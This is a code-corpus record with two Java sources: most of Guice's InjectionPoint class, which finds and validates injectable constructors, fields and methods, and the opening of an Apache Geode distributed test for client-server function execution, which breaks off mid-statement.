java.lang.reflect.Modifier; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.HashMap; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Set; import java.util.function.Predicate; import java.util.logging.Level; import java.util.logging.Logger; import java.util.stream.Collectors; /** * A constructor, field or method that can receive injections. Typically this is a member with the * {@literal @}{@link Inject} annotation. For non-private, no argument constructors, the member may * omit the annotation. * * @author crazybob@google.com (Bob Lee) * @since 2.0 */ public final class InjectionPoint { private static final Logger logger = Logger.getLogger(InjectionPoint.class.getName()); private final boolean optional; private final Member member; private final TypeLiteral<?> declaringType; private final ImmutableList<Dependency<?>> dependencies; InjectionPoint(TypeLiteral<?> declaringType, Method method, boolean optional) { this.member = method; this.declaringType = declaringType; this.optional = optional; this.dependencies = forMember( new Errors(method), method, declaringType, method.getAnnotatedParameterTypes(), method.getParameterAnnotations(), KotlinSupport.getInstance().getIsParameterKotlinNullablePredicate(method)); } InjectionPoint(TypeLiteral<?> declaringType, Constructor<?> constructor) { this.member = constructor; this.declaringType = declaringType; this.optional = false; Errors errors = new Errors(constructor); KotlinSupport.getInstance().checkConstructorParameterAnnotations(constructor, errors); this.dependencies = forMember( errors, constructor, declaringType, constructor.getAnnotatedParameterTypes(), constructor.getParameterAnnotations(), KotlinSupport.getInstance().getIsParameterKotlinNullablePredicate(constructor)); } InjectionPoint(TypeLiteral<?> declaringType, Field field, boolean optional) { this.member = field; this.declaringType = declaringType; this.optional = optional; Annotation[] annotations = getAnnotations(field); Annotation[] typeUseAnnotations = field.getAnnotatedType().getAnnotations(); Errors errors = new Errors(field); Key<?> key = null; try { key = Annotations.getKey(declaringType.getFieldType(field), field, annotations, errors); } catch (ConfigurationException e) { errors.merge(e.getErrorMessages()); } catch (ErrorsException e) { errors.merge(e.getErrors()); } errors.throwConfigurationExceptionIfErrorsExist(); boolean allowsNull = Nullability.hasNullableAnnotation(annotations) || Nullability.hasNullableAnnotation(typeUseAnnotations) || KotlinSupport.getInstance().isNullable(field); this.dependencies = ImmutableList.<Dependency<?>>of(newDependency(key, allowsNull, -1)); } private ImmutableList<Dependency<?>> forMember( Errors errors, Member member, TypeLiteral<?> type, AnnotatedType[] annotatedTypes, Annotation[][] parameterAnnotationsPerParameter, Predicate<Integer> isParameterKotlinNullable) { List<Dependency<?>> dependencies = Lists.newArrayList(); int index = 0; for (TypeLiteral<?> parameterType : type.getParameterTypes(member)) { try { Annotation[] typeAnnotations = annotatedTypes[index].getAnnotations(); Annotation[] parameterAnnotations = parameterAnnotationsPerParameter[index]; Key<?> key = Annotations.getKey(parameterType, member, parameterAnnotations, errors); boolean isNullable = Nullability.hasNullableAnnotation(parameterAnnotations) || Nullability.hasNullableAnnotation(typeAnnotations) || isParameterKotlinNullable.test(index); dependencies.add(newDependency(key, isNullable, index)); index++; } catch (ConfigurationException e) { errors.merge(e.getErrorMessages()); } catch (ErrorsException e) { errors.merge(e.getErrors()); } } errors.throwConfigurationExceptionIfErrorsExist(); return ImmutableList.copyOf(dependencies); } // This metohd is necessary to create a Dependency<T> with proper generic type information private <T> Dependency<T> newDependency(Key<T> key, boolean allowsNull, int parameterIndex) { return new Dependency<T>(this, key, allowsNull, parameterIndex); } /** Returns the injected constructor, field, or method. */ public Member getMember() { // TODO: Don't expose the original member (which probably has setAccessible(true)). return member; } /** * Returns the dependencies for this injection point. If the injection point is for a method or * constructor, the dependencies will correspond to that member's parameters. Field injection * points always have a single dependency for the field itself. * * @return a possibly-empty list */ public List<Dependency<?>> getDependencies() { return dependencies; } /** * Returns true if this injection point shall be skipped if the injector cannot resolve bindings * for all required dependencies. Both explicit bindings (as specified in a module), and implicit * bindings ({@literal @}{@link com.google.inject.ImplementedBy ImplementedBy}, default * constructors etc.) may be used to satisfy optional injection points. */ public boolean isOptional() { return optional; } /** * Returns true if the element is annotated with {@literal @}{@link Toolable}. * * @since 3.0 */ public boolean isToolable() { return ((AnnotatedElement) member).isAnnotationPresent(Toolable.class); } /** * Returns the generic type that defines this injection point. If the member exists on a * parameterized type, the result will include more type information than the member's {@link * Member#getDeclaringClass() raw declaring class}. * * @since 3.0 */ public TypeLiteral<?> getDeclaringType() { return declaringType; } @Override public boolean equals(Object o) { return o instanceof InjectionPoint && member.equals(((InjectionPoint) o).member) && declaringType.equals(((InjectionPoint) o).declaringType); } @Override public int hashCode() { return member.hashCode() ^ declaringType.hashCode(); } @Override public String toString() { return Classes.toString(member); } /** * Returns a new injection point for the specified constructor. If the declaring type of {@code * constructor} is parameterized (such as {@code List<T>}), prefer the overload that includes a * type literal. * * @param constructor any single constructor present on {@code type}. * @since 3.0 */ public static <T> InjectionPoint forConstructor(Constructor<T> constructor) { return new InjectionPoint(TypeLiteral.get(constructor.getDeclaringClass()), constructor); } /** * Returns a new injection point for the specified constructor of {@code type}. * * @param constructor any single constructor present on {@code type}. * @param type the concrete type that defines {@code constructor}. * @since 3.0 */ public static <T> InjectionPoint forConstructor( Constructor<T> constructor, TypeLiteral<? extends T> type) { if (type.getRawType() != constructor.getDeclaringClass()) { new Errors(type) .constructorNotDefinedByType(constructor, type) .throwConfigurationExceptionIfErrorsExist(); } return new InjectionPoint(type, constructor); } /** * Returns a new injection point for the injectable constructor of {@code type}. * * <p>Either a {@code @Inject} annotated constructor or a non-private no arg constructor is * required to be defined by the class corresponding to {@code type}. * * @param type a concrete type with exactly one constructor annotated {@literal @}{@link Inject}, * or a no-arguments constructor that is not private. * @throws ConfigurationException if there is no injectable constructor, more than one injectable * constructor, or if parameters of the injectable constructor are malformed, such as a * parameter with multiple binding annotations. */ public static InjectionPoint forConstructorOf(TypeLiteral<?> type) { return forConstructorOf(type, false); } /** * Returns a new injection point for the injectable constructor of {@code type}. * * <p>If {@code atInjectRequired} is true, the constructor must be annotated with {@code @Inject}. * If {@code atInjectRequired} is false, either a {@code @Inject} annotated constructor or a * non-private no arg constructor is required to be defined by the class corresponding to {@code * type}. * * @param type a concrete type with exactly one constructor annotated {@code @Inject}, or a * no-arguments constructor that is not private. * @param atInjectRequired whether the constructor must be annotated with {@code Inject}. * @throws ConfigurationException if there is no injectable constructor, more than one injectable * constructor, or if parameters of the injectable constructor are malformed, such as a * parameter with multiple binding annotations. * @since 5.0 */ public static InjectionPoint forConstructorOf(TypeLiteral<?> type, boolean atInjectRequired) { Class<?> rawType = getRawType(type.getType()); Errors errors = new Errors(rawType); List<Constructor<?>> atInjectConstructors = Arrays.stream(rawType.getDeclaredConstructors()) .filter(InjectionPoint::isInjectableConstructor) .collect(Collectors.toList()); Constructor<?> injectableConstructor = null; atInjectConstructors.stream() .filter(constructor -> constructor.isAnnotationPresent(Inject.class)) .filter(constructor -> constructor.getAnnotation(Inject.class).optional()) .forEach(errors::optionalConstructor); if (atInjectConstructors.size() > 1) { errors.tooManyConstructors(rawType); } else { injectableConstructor = Iterables.getOnlyElement(atInjectConstructors, null); if (injectableConstructor != null) { checkForMisplacedBindingAnnotations(injectableConstructor, errors); } } if (atInjectRequired && injectableConstructor == null) { errors.atInjectRequired(type); } errors.throwConfigurationExceptionIfErrorsExist(); if (injectableConstructor != null) { return new InjectionPoint(type, injectableConstructor); } // If no annotated constructor is found, look for a no-arg constructor instead. try { Constructor<?> noArgConstructor = rawType.getDeclaredConstructor(); // Disallow private constructors on non-private classes (unless they have @Inject) if (Modifier.isPrivate(noArgConstructor.getModifiers()) && !Modifier.isPrivate(rawType.getModifiers())) { errors.missingConstructor(type); throw new ConfigurationException(errors.getMessages()); } checkForMisplacedBindingAnnotations(noArgConstructor, errors); return new InjectionPoint(type, noArgConstructor); } catch (NoSuchMethodException e) { errors.missingConstructor(type); throw new ConfigurationException(errors.getMessages()); } } private static boolean isInjectableConstructor(Constructor<?> constructor) { return constructor.isAnnotationPresent(Inject.class) || constructor.isAnnotationPresent(jakarta.inject.Inject.class); } /** * Returns a new injection point for the injectable constructor of {@code type}. * * @param type a concrete type with exactly one constructor annotated {@literal @}{@link Inject}, * or a no-arguments constructor that is not private. * @throws ConfigurationException if there is no injectable constructor, more than one injectable * constructor, or if parameters of the injectable constructor are malformed, such as a * parameter with multiple binding annotations. */ public static InjectionPoint forConstructorOf(Class<?> type) { return forConstructorOf(TypeLiteral.get(type)); } /** * Returns a new injection point for the specified method of {@code type}. This is useful for * extensions that need to build dependency graphs from arbitrary methods. * * @param method any single method present on {@code type}. * @param type the concrete type that defines {@code method}. * @since 4.0 */ public static <T> InjectionPoint forMethod(Method method, TypeLiteral<T> type) { return new InjectionPoint(type, method, false); } /** * Returns all static method and field injection points on {@code type}. * * @return a possibly empty set of injection points. The set has a specified iteration order. All * fields are returned and then all methods. Within the fields, supertype fields are returned * before subtype fields. Similarly, supertype methods are returned before subtype methods. * @throws ConfigurationException if there is a malformed injection point on {@code type}, such as * a field with multiple binding annotations. The exception's {@link * ConfigurationException#getPartialValue() partial value} is a {@code Set<InjectionPoint>} of * the valid injection points. */ public static Set<InjectionPoint> forStaticMethodsAndFields(TypeLiteral<?> type) { Errors errors = new Errors(); Set<InjectionPoint> result; if (type.getRawType().isInterface()) { errors.staticInjectionOnInterface(type.getRawType()); result = null; } else { result = getInjectionPoints(type, true, errors); } if (errors.hasErrors()) { throw new ConfigurationException(errors.getMessages()).withPartialValue(result); } return result; } /** * Returns all static method and field injection points on {@code type}. * * @return a possibly empty set of injection points. The set has a specified iteration order. All * fields are returned and then all methods. Within the fields, supertype fields are returned * before subtype fields. Similarly, supertype methods are returned before subtype methods. * @throws ConfigurationException if there is a malformed injection point on {@code type}, such as * a field with multiple binding annotations. The exception's {@link * ConfigurationException#getPartialValue() partial value} is a {@code Set<InjectionPoint>} of * the valid injection points. */ public static Set<InjectionPoint> forStaticMethodsAndFields(Class<?> type) { return forStaticMethodsAndFields(TypeLiteral.get(type)); } /** * Returns all instance method and field injection points on {@code type}. * * @return a possibly empty set of injection points. The set has a specified iteration order. All * fields are returned and then all methods. Within the fields, supertype fields are returned * before subtype fields. Similarly, supertype methods are returned before subtype methods. * @throws ConfigurationException if there is a malformed injection point on {@code type}, such as * a field with multiple binding annotations. The exception's {@link * ConfigurationException#getPartialValue() partial value} is a {@code Set<InjectionPoint>} of * the valid injection points. */ public static Set<InjectionPoint> forInstanceMethodsAndFields(TypeLiteral<?> type) { Errors errors = new Errors(); Set<InjectionPoint> result = getInjectionPoints(type, false, errors); if (errors.hasErrors()) { throw new ConfigurationException(errors.getMessages()).withPartialValue(result); } return result; } /** * Returns all instance method and field injection points on {@code type}. * * @return a possibly empty set of injection points. The set has a specified iteration order. All * fields are returned and then all methods. Within the fields, supertype fields are returned * before subtype fields. Similarly, supertype methods are returned before subtype methods. * @throws ConfigurationException if there is a malformed injection point on {@code type}, such as * a field with multiple binding annotations. The exception's {@link * ConfigurationException#getPartialValue() partial value} is a {@code Set<InjectionPoint>} of * the valid injection points. */ public static Set<InjectionPoint> forInstanceMethodsAndFields(Class<?> type) { return forInstanceMethodsAndFields(TypeLiteral.get(type)); } /** Returns true if the binding annotation is in the wrong place. */ private static boolean checkForMisplacedBindingAnnotations(Member member, Errors errors) { Annotation misplacedBindingAnnotation = Annotations.findBindingAnnotation( errors, member, ((AnnotatedElement) member).getAnnotations()); if (misplacedBindingAnnotation == null) { return false; } // don't warn about misplaced binding annotations on methods when there's a field with the same // name. In Scala, fields always get accessor methods (that we need to ignore). See bug 242. if (member instanceof Method) { try { if (member.getDeclaringClass().getDeclaredField(member.getName()) != null) { return false; } } catch (NoSuchFieldException ignore) { } } errors.misplacedBindingAnnotation(member, misplacedBindingAnnotation); return true; } /** Node in the doubly-linked list of injectable members (fields and methods). */ abstract static class InjectableMember { final TypeLiteral<?> declaringType; final boolean optional; final boolean specInject; InjectableMember previous; InjectableMember next; InjectableMember(TypeLiteral<?> declaringType, Annotation atInject) { this.declaringType = declaringType; if ( atInject.annotationType() == jakarta.inject.Inject.class) { optional = false; specInject = true; return; } specInject = false; optional = ((Inject) atInject).optional(); } abstract InjectionPoint toInjectionPoint(); } static class InjectableField extends InjectableMember { final Field field; InjectableField(TypeLiteral<?> declaringType, Field field, Annotation atInject) { super(declaringType, atInject); this.field = field; } @Override InjectionPoint toInjectionPoint() { return new InjectionPoint(declaringType, field, optional); } } static class InjectableMethod extends InjectableMember { final Method method; /** * true if this method overrode a method that was annotated with com.google.inject.Inject. used * to allow different override behavior for guice inject vs jsr330 Inject */ boolean overrodeGuiceInject; InjectableMethod(TypeLiteral<?> declaringType, Method method, Annotation atInject) { super(declaringType, atInject); this.method = method; } @Override InjectionPoint toInjectionPoint() { return new InjectionPoint(declaringType, method, optional); } public boolean isFinal() { return Modifier.isFinal(method.getModifiers()); } } static Annotation getAtInject(AnnotatedElement member) { Annotation a = member.getAnnotation(jakarta.inject.Inject.class); return a == null ? member.getAnnotation(Inject.class) : a; } /** Linked list of injectable members. */ static class InjectableMembers { InjectableMember head; InjectableMember tail; void add(InjectableMember member) { if (head == null) { head = tail = member; } else { member.previous = tail; tail.next = member; tail = member; } } void remove(InjectableMember member) { if (member.previous != null) { member.previous.next = member.next; } if (member.next != null) { member.next.previous = member.previous; } if (head == member) { head = member.next; } if (tail == member) { tail = member.previous; } } boolean isEmpty() { return head == null; } } /** Position in type hierarchy. */ enum Position { TOP, // No need to check for overridden methods MIDDLE, BOTTOM // Methods won't be overridden } /** * Keeps track of injectable methods so we can remove methods that get overridden in O(1) time. * Uses our position in the type hierarchy to perform optimizations. */ static class OverrideIndex { final InjectableMembers injectableMembers; Map<Signature, List<InjectableMethod>> bySignature; Position position = Position.TOP; OverrideIndex(InjectableMembers injectableMembers) { this.injectableMembers = injectableMembers; } /* Caches the signature for the last method. */ Method lastMethod; Signature lastSignature; /** * Removes a method overridden by the given method, if present. In order to remain backwards * compatible with prior Guice versions, this will *not* remove overridden methods if * 'alwaysRemove' is false and the overridden signature was annotated with a * com.google.inject.Inject. * * @param method The method used to determine what is overridden and should be removed. * @param alwaysRemove true if overridden methods should be removed even if they were * guice @Inject * @param injectableMethod if this method overrode any guice @Inject methods, {@link * InjectableMethod#overrodeGuiceInject} is set to true */ boolean removeIfOverriddenBy( Method method, boolean alwaysRemove, InjectableMethod injectableMethod) { if (position == Position.TOP) { // If we're at the top of the hierarchy, there's nothing to override. return false; } if (bySignature == null) { // We encountered a method in a subclass. Time to index the // methods in the parent class. bySignature = new HashMap<>(); for (InjectableMember member = injectableMembers.head; member != null; member = member.next) { if (!(member instanceof InjectableMethod)) { continue; } InjectableMethod im = (InjectableMethod) member; if (im.isFinal()) { continue; } List<InjectableMethod> methods = new ArrayList<>(); methods.add(im); bySignature.put(new Signature(im.method), methods); } } lastMethod = method; Signature signature = lastSignature = new Signature(method); List<InjectableMethod> methods = bySignature.get(signature); boolean removed = false; if (methods != null) { for (Iterator<InjectableMethod> iterator = methods.iterator(); iterator.hasNext(); ) { InjectableMethod possiblyOverridden = iterator.next(); if (overrides(method, possiblyOverridden.method)) { boolean wasGuiceInject = !possiblyOverridden.specInject || possiblyOverridden.overrodeGuiceInject; if (injectableMethod != null) { injectableMethod.overrodeGuiceInject = wasGuiceInject; } // Only actually remove the methods if we want to force // remove or if the signature never specified @com.google.inject.Inject // somewhere. if (alwaysRemove || !wasGuiceInject) { removed = true; iterator.remove(); injectableMembers.remove(possiblyOverridden); } } } } return removed; } /** * Adds the given method to the list of injection points. Keeps track of it in this index in * case it gets overridden. */ void add(InjectableMethod injectableMethod) { injectableMembers.add(injectableMethod); if (position == Position.BOTTOM || injectableMethod.isFinal()) { // This method can't be overridden, so there's no need to index it. return; } if (bySignature != null) { // Try to reuse the signature we created during removal @SuppressWarnings("ReferenceEquality") Signature signature = injectableMethod.method == lastMethod ? lastSignature : new Signature(injectableMethod.method); bySignature.computeIfAbsent(signature, k -> new ArrayList<>()).add(injectableMethod); } } } /** * Returns an ordered, immutable set of injection points for the given type. Members in * superclasses come before members in subclasses. Within a class, fields come before methods. * Overridden methods are filtered out. The order of fields/methods within a class is consistent * but undefined. * * @param statics true is this method should return static members, false for instance members * @param errors used to record errors */ private static Set<InjectionPoint> getInjectionPoints( final TypeLiteral<?> type, boolean statics, Errors errors) { InjectableMembers injectableMembers = new InjectableMembers(); OverrideIndex overrideIndex = null; List<TypeLiteral<?>> hierarchy = hierarchyFor(type); int topIndex = hierarchy.size() - 1; for (int i = topIndex; i >= 0; i--) { if (overrideIndex != null && i < topIndex) { // Knowing the position within the hierarchy helps us make optimizations. if (i == 0) { overrideIndex.position = Position.BOTTOM; } else { overrideIndex.position = Position.MIDDLE; } } TypeLiteral<?> current = hierarchy.get(i); for (Field field : getDeclaredFields(current)) { if (Modifier.isStatic(field.getModifiers()) == statics) { Annotation atInject = getAtInject(field); if (atInject != null) { InjectableField injectableField = new InjectableField(current, field, atInject); if (injectableField.specInject && Modifier.isFinal(field.getModifiers())) { errors.cannotInjectFinalField(field); } injectableMembers.add(injectableField); } } } for (Method method : getDeclaredMethods(current)) { if (isEligibleForInjection(method, statics)) { Annotation atInject = getAtInject(method); if (atInject != null) { InjectableMethod injectableMethod = new InjectableMethod(current, method, atInject); if (checkForMisplacedBindingAnnotations(method, errors) || !isValidMethod(injectableMethod, errors)) { if (overrideIndex != null) { boolean removed = overrideIndex.removeIfOverriddenBy(method, false, injectableMethod); if (removed) { logger.log( Level.WARNING, "Method: {0} is not a valid injectable method (" + "because it either has misplaced binding annotations " + "or specifies type parameters) but is overriding a method that is " + "valid. Because it is not valid, the method will not be injected. " + "To fix this, make the method a valid injectable method.", method); } } continue; } if (statics) { injectableMembers.add(injectableMethod); } else { if (overrideIndex == null) { /* * Creating the override index lazily means that the first type in the hierarchy * with injectable methods (not necessarily the top most type) will be treated as * the TOP position and will enjoy the same optimizations (no checks for overridden * methods, etc.). */ overrideIndex = new OverrideIndex(injectableMembers); } else { // Forcibly remove the overridden method, otherwise we'll inject // it twice. overrideIndex.removeIfOverriddenBy(method, true, injectableMethod); } overrideIndex.add(injectableMethod); } } else { if (overrideIndex != null) { boolean removed = overrideIndex.removeIfOverriddenBy(method, false, null); if (removed) { logger.log( Level.WARNING, "Method: {0} is not annotated with @Inject but " + "is overriding a method that is annotated with @jakarta.inject.Inject." + "Because it is not annotated with @Inject, the method will not be " + "injected. To fix this, annotate the method with @Inject.", method); } } } } } } if (injectableMembers.isEmpty()) { return Collections.emptySet(); } ImmutableSet.Builder<InjectionPoint> builder = ImmutableSet.builder(); for (InjectableMember im = injectableMembers.head; im != null; im = im.next) { try { builder.add(im.toInjectionPoint()); } catch (ConfigurationException ignorable) { if (!im.optional) { errors.merge(ignorable.getErrorMessages()); } } } return builder.build(); } private static Field[] getDeclaredFields(TypeLiteral<?> type) { return DeclaredMembers.getDeclaredFields(type.getRawType()); } private static Method[] getDeclaredMethods(TypeLiteral<?> type) { return DeclaredMembers.getDeclaredMethods(type.getRawType()); } /** * Returns true if the method is eligible to be injected. This is different than {@link * #isValidMethod}, because ineligibility will not drop a method from being injected if a * superclass was eligible and valid. Bridge and synthetic methods are excluded from eligibility * for two reasons: * * <p>Prior to Java8, javac would generate these methods in subclasses without annotations, which * means this would accidentally stop injecting a method annotated with {@link * jakarta.inject.Inject}, since the spec says to stop injecting if a subclass isn't annotated with * it. * * <p>Starting at Java8, javac copies the annotations to the generated subclass method, except it * leaves out the generic types. If this considered it a valid injectable method, this would eject * the parent's overridden method that had the proper generic types, and would use invalid * injectable parameters as a result. * * <p>The fix for both is simply to ignore these synthetic bridge methods. */ private static boolean isEligibleForInjection(Method method, boolean statics) { return Modifier.isStatic(method.getModifiers()) == statics && !method.isBridge() && !method.isSynthetic(); } private static boolean isValidMethod(InjectableMethod injectableMethod, Errors errors) { boolean result = true; if (injectableMethod.specInject) { Method method = injectableMethod.method; if (Modifier.isAbstract(method.getModifiers())) { errors.cannotInjectAbstractMethod(method); result = false; } if (method.getTypeParameters().length > 0) { errors.cannotInjectMethodWithTypeParameters(method); result = false; } } return result; } private static List<TypeLiteral<?>> hierarchyFor(TypeLiteral<?> type) { List<TypeLiteral<?>> hierarchy = new ArrayList<>(); TypeLiteral<?> current = type; while (current.getRawType() != Object.class) { hierarchy.add(current); current = current.getSupertype(current.getRawType().getSuperclass()); } return hierarchy; } /** * Returns true if a overrides b. Assumes signatures of a and b are the same and a's declaring * class is a subclass of b's declaring class. */ private static boolean overrides(Method a, Method b) { // See JLS section 8.4.8.1 int modifiers = b.getModifiers(); if (Modifier.isPublic(modifiers) || Modifier.isProtected(modifiers)) { return true; } if (Modifier.isPrivate(modifiers)) { return false; } // b must be package-private return a.getDeclaringClass().getPackage().equals(b.getDeclaringClass().getPackage()); } /** * Returns all the annotations on a field. If Kotlin-support is enabled, the annotations will * include annotations on the related Kotlin-property. * * @since 5.0 */ public static Annotation[] getAnnotations(Field field) { Annotation[] javaAnnotations = field.getAnnotations(); Annotation[] kotlinAnnotations = KotlinSupport.getInstance().getAnnotations(field); if (kotlinAnnotations.length == 0) { return javaAnnotations; } return ObjectArrays.concat(javaAnnotations, kotlinAnnotations, Annotation.class); } /** A method signature. Used to handle method overriding. */ static class Signature { final String name; final Class<?>[] parameterTypes; final int hash; Signature(Method method) { this.name = method.getName(); this.parameterTypes = method.getParameterTypes(); int h = name.hashCode(); h = h * 31 + parameterTypes.length; for (Class<?> parameterType : parameterTypes) { h = h * 31 + parameterType.hashCode(); } this.hash = h; } @Override public int hashCode() { return this.hash; } @Override public boolean equals(Object o) { if (!(o instanceof Signature)) { return false; } Signature other = (Signature) o; if (!name.equals(other.name)) { return false; } if (parameterTypes.length != other.parameterTypes.length) { return false; } for (int i = 0; i < parameterTypes.length; i++) { if (parameterTypes[i] != other.parameterTypes[i]) { return false; } } return true; } } }
apache/geode
35,748
geode-core/src/distributedTest/java/org/apache/geode/internal/cache/execute/ClientServerFunctionExecutionDUnitTest.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more contributor license * agreements. See the NOTICE file distributed with this work for additional information regarding * copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance with the License. You may obtain a * copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package org.apache.geode.internal.cache.execute; import static org.assertj.core.api.Assertions.assertThatThrownBy; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertNull; import static org.junit.Assert.assertTrue; import static org.junit.Assert.fail; import java.io.Serializable; import java.util.ArrayList; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Properties; import org.apache.logging.log4j.Logger; import org.junit.Test; import org.junit.experimental.categories.Category; import org.junit.runner.RunWith; import org.junit.runners.Parameterized; import org.junit.runners.Parameterized.UseParametersRunnerFactory; import org.apache.geode.cache.AttributesFactory; import org.apache.geode.cache.DataPolicy; import org.apache.geode.cache.Region; import org.apache.geode.cache.RegionAttributes; import org.apache.geode.cache.RegionShortcut; import org.apache.geode.cache.Scope; import org.apache.geode.cache.client.Pool; import org.apache.geode.cache.client.ServerConnectivityException; import org.apache.geode.cache.client.ServerOperationException; import org.apache.geode.cache.execute.Execution; import org.apache.geode.cache.execute.Function; import org.apache.geode.cache.execute.FunctionAdapter; import org.apache.geode.cache.execute.FunctionContext; import org.apache.geode.cache.execute.FunctionService; import org.apache.geode.cache.execute.ResultCollector; import org.apache.geode.cache.execute.ResultSender; import org.apache.geode.distributed.ConfigurationProperties; import org.apache.geode.distributed.DistributedSystem; import org.apache.geode.internal.cache.functions.TestFunction; import org.apache.geode.internal.cache.tier.sockets.CacheServerTestUtil; import org.apache.geode.logging.internal.log4j.api.LogService; import org.apache.geode.test.awaitility.GeodeAwaitility; import org.apache.geode.test.dunit.Assert; import org.apache.geode.test.dunit.IgnoredException; import org.apache.geode.test.dunit.SerializableRunnableIF; import org.apache.geode.test.dunit.WaitCriterion; import org.apache.geode.test.junit.categories.ClientServerTest; import org.apache.geode.test.junit.categories.FunctionServiceTest; import org.apache.geode.test.junit.runners.CategoryWithParameterizedRunnerFactory; @Category({ClientServerTest.class, FunctionServiceTest.class}) @RunWith(Parameterized.class) @UseParametersRunnerFactory(CategoryWithParameterizedRunnerFactory.class) public class ClientServerFunctionExecutionDUnitTest extends PRClientServerTestBase { private static final Logger logger = LogService.getLogger(); private static final String TEST_FUNCTION1 = TestFunction.TEST_FUNCTION1; private Boolean isByName = null; Function function = null; private Boolean toRegister = null; private static final String retryRegionName = "RetryDataRegion"; private static Region metaDataRegion; public ClientServerFunctionExecutionDUnitTest() { super(); } @Override protected final void postSetUpPRClientServerTestBase() { IgnoredException.addIgnoredException("java.net.ConnectException"); } @Override public Properties getDistributedSystemProperties() { Properties result = super.getDistributedSystemProperties(); result.put(ConfigurationProperties.SERIALIZABLE_OBJECT_FILTER, "org.apache.geode.internal.cache.execute.**;org.apache.geode.test.dunit.**"); return result; } @Test public void throwsExceptionWhenFunctionNotRegisteredOnServer() { createScenario(); try { client.invoke(ClientServerFunctionExecutionDUnitTest::executeRegisteredFunction); } catch (Exception e) { assertTrue((e.getCause() instanceof ServerOperationException)); assertTrue( e.getCause().getMessage().contains("The function is not registered for function id")); } } @Test public void noExceptionWhenFunctionRegisteredOnServer() { createScenario(); Function function = new TestFunction(true, TestFunction.TEST_FUNCTION1); registerFunctionAtServer(function); client.invoke(ClientServerFunctionExecutionDUnitTest::executeRegisteredFunction); } /* * Execution of the function on server using the name of the function */ @Test public void testServerExecution_byName() { createScenario(); // function = new TestFunction1(); function = new TestFunction(true, TEST_FUNCTION1); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.TRUE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.serverExecution(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.allServerExecution(isByName, function, toRegister)); } @Test public void testServerExecution_sendException() { createScenario(); // function = new TestFunction1(); function = new TestFunction(true, TestFunction.TEST_FUNCTION_SEND_EXCEPTION); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.TRUE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .serverExecution_SendException(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .allServerExecution_SendException(isByName, function, toRegister)); } /* * Execution of the function on server using the name of the function */ @Test public void testServerExecution_NoLastResult() { createScenario(); // function = new TestFunction1(); function = new TestFunction(true, TestFunction.TEST_FUNCTION_NO_LASTRESULT); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.TRUE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .serverExecution_NoLastResult(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .allServerExecution_NoLastResult(isByName, function, toRegister)); } @Test public void testServerExecution_byName_WithoutRegister() { createScenario(); // function = new TestFunction1(); function = new TestFunction(true, TEST_FUNCTION1); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.FALSE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.serverExecution(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.allServerExecution(isByName, function, toRegister)); } /* * Execution of the inline function on server */ @Test public void testServerExecution_byInlineFunction() { createScenario(); logger.info( "ClientServerFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(ClientServerFunctionExecutionDUnitTest::serverExecution_Inline); client.invoke(ClientServerFunctionExecutionDUnitTest::allServerExecution_Inline); } /* * Execution of the inline function on server */ @Test public void testServerExecution_byInlineFunction_InvalidAttrbiutes() { createScenario(); logger.info( "ClientServerFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke( ClientServerFunctionExecutionDUnitTest::serverExecution_Inline_InvalidAttributes); } /* * Execution of the inline function on server */ @Test public void testBug40714() { createScenario(); logger .info("ClientServerFunctionExecutionDUnitTest#testBug40714 : Starting test"); server1.invoke( (SerializableRunnableIF) ClientServerFunctionExecutionDUnitTest::registerFunction); server1.invoke( (SerializableRunnableIF) ClientServerFunctionExecutionDUnitTest::registerFunction); server1.invoke( (SerializableRunnableIF) ClientServerFunctionExecutionDUnitTest::registerFunction); client .invoke((SerializableRunnableIF) ClientServerFunctionExecutionDUnitTest::registerFunction); client.invoke(ClientServerFunctionExecutionDUnitTest::FunctionExecution_Inline_Bug40714); } public static void registerFunction() { FunctionService.registerFunction(new FunctionAdapter() { @Override public void execute(FunctionContext context) { @SuppressWarnings("unchecked") final ResultSender<Object> resultSender = context.getResultSender(); if (context.getArguments() instanceof String) { resultSender.lastResult("Failure"); } else if (context.getArguments() instanceof Boolean) { resultSender.lastResult(Boolean.FALSE); } } @Override public String getId() { return "Function"; } @Override public boolean hasResult() { return true; } }); } private static void FunctionExecution_Inline_Bug40714() { DistributedSystem.setThreadsSocketPolicy(false); Execution member = FunctionService.onServers(pool); try { ResultCollector rs = member.setArguments(Boolean.TRUE).execute(new FunctionAdapter() { @Override public void execute(FunctionContext context) { @SuppressWarnings("unchecked") final ResultSender<Object> resultSender = context.getResultSender(); if (context.getArguments() instanceof String) { resultSender.lastResult("Success"); } else if (context.getArguments() instanceof Boolean) { resultSender.lastResult(Boolean.TRUE); } } @Override public String getId() { return 